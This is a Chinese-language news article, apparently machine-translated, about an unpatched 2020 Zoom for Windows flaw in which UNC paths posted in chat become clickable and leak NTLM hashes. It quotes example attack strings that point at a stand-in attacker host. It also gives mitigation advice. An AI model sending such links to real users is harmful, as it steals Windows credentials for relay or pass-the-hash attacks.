黑客可通过Zoom毫无警告地窃取用户的Windows凭据

Windows版Zoom将网络位置转换为可单击的链接。可能出什么问题了？

通过Zoom窃取用户的Windows凭据

Windows版Zoom用户要当心：研究人员说，广泛使用的软件存在一个漏洞，攻击者可以利用该漏洞窃取您的操作系统凭据。

在冠状病毒大流行之后，Zoom的使用量猛增，从而发现了当前未修补的漏洞。由于有很多人在家工作，他们依靠Zoom与同事，客户和合作伙伴联系。这些家庭用户中的许多人通过临时或临时手段连接到敏感的工作网络，而这些手段没有从在本地发现的企业级防火墙中受益。

在此处嵌入网络位置

攻击通过使用“缩放”聊天窗口向目标发送一个字符串来表示目标，该字符串代表他们所使用的Windows设备上的网络位置。Windows的Zoom应用程序自动将这些所谓的通用命名约定字符串（例如\\ attacker.example.com/C$）转换为可点击的链接。如果目标是单击未完全锁定的网络上的那些链接，则Zoom会将Windows用户名和相应的NTLM哈希发送到链接中包含的地址。

然后，攻击者可以使用凭据访问共享网络资源，例如Outlook服务器和存储设备。通常，在对设备进行身份验证时，Windows网络上的资源将接受NTLM哈希。这使网络容易受到所谓的“哈希传递”攻击，这种攻击不需要破解技术即可将哈希转换为相应的纯文本密码。

“这是Zoom的一个相当大的缺点，”安全精品店Hacker House的联合创始人Matthew Hickey 告诉我。“这是一个非常琐碎的错误。现在，随着越来越多的人在家工作，利用该漏洞变得更加容易。”

在收到评论请求后24小时内以及此帖子发布后9小时后，Zoom代表通过电子邮件发送了以下声明：“在Zoom，确保我们用户及其数据的隐私和安全至关重要。我们知道UNC问题，并正在努力解决。”

该漏洞由上周使用Twitter句柄@ _g0dmode的研究人员首次描述。他写道：“＃Zoom聊天使您可以发布\\ xxxx \ xyz之类的链接，以尝试捕获Net-NTLM哈希（如果其他用户单击）。

#Zoom chat allows you to post links such as \\x.x.x.x\xyz to attempt to capture Net-NTLM hashes if clicked by other users.

— Mitch (@_g0dmode) March 23, 2020

周二，Hickey扩大了发现范围。他在一条推文中展示了Zoom Windows客户端如何公开可用于访问Windows网络受限部分的凭据。

Hi @zoom_us & @NCSC - here is an example of exploiting the Zoom Windows client using UNC path injection to expose credentials for use in SMBRelay attacks. The screen shot below shows an example UNC path link and the credentials being exposed (redacted). pic.twitter.com/gjWXas7TMO

— Hacker Fantastic (@hackerfantastic) March 31, 2020

屏幕快照显示Windows用户名为Bluemoon / HackerFantastic。紧随其后的是NTLM哈希，尽管Hickey在他发布的图像中删除了大部分哈希。

@zoom_us和@NCSC，您好-这是一个使用UNC路径注入来利用Zoom Windows客户端来公开用于SMBRelay攻击的凭据的示例。下面的屏幕快照显示了示例UNC路径链接和公开（已编辑）的凭据。pic.twitter.com/gjWXas7TMO

-Hacker Fantastic（@hackerfantastic）2020年3月31日

冒充合法会议参加者的人或在所谓的Zoom轰炸袭击中可能发动攻击，其中巨魔访问不受密码保护的会议，并用冒犯性或骚扰性图像轰炸其他所有人。

保护你自己

Hickey说，虽然这种攻击仅对Windows用户有效，但可以通过使用任何形式的Zoom来发起攻击，方法是在文本消息中向目标发送UNC位置。当Windows用户在连接到某些不安全的计算机或网络时单击链接时，Zoom应用程序将通过端口445发送凭据，该凭据用于传输与Windows SMB和Active Directory服务有关的流量。

如果端口445通过设备或网络防火墙或通过阻止它的ISP封闭到Internet，则该攻击将不会起作用。但是，鉴于很多Zoom用户的网络都不会关闭此出口，这几乎是不可能的。过去一个月的事件使数以百万计的人在家中工作，而他们在房地中工作时所获得的IT和安全支持水平却不相同。由于疏忽或由于需要端口445连接到企业资源，因此更有可能打开端口445。

Zoom的声明没有指出何时进行修复。在此之前，Windows用户应该特别怀疑包含链接的聊天消息。在可能的情况下，用户还应确保端口445被阻止或只能访问Internet上的可信地址。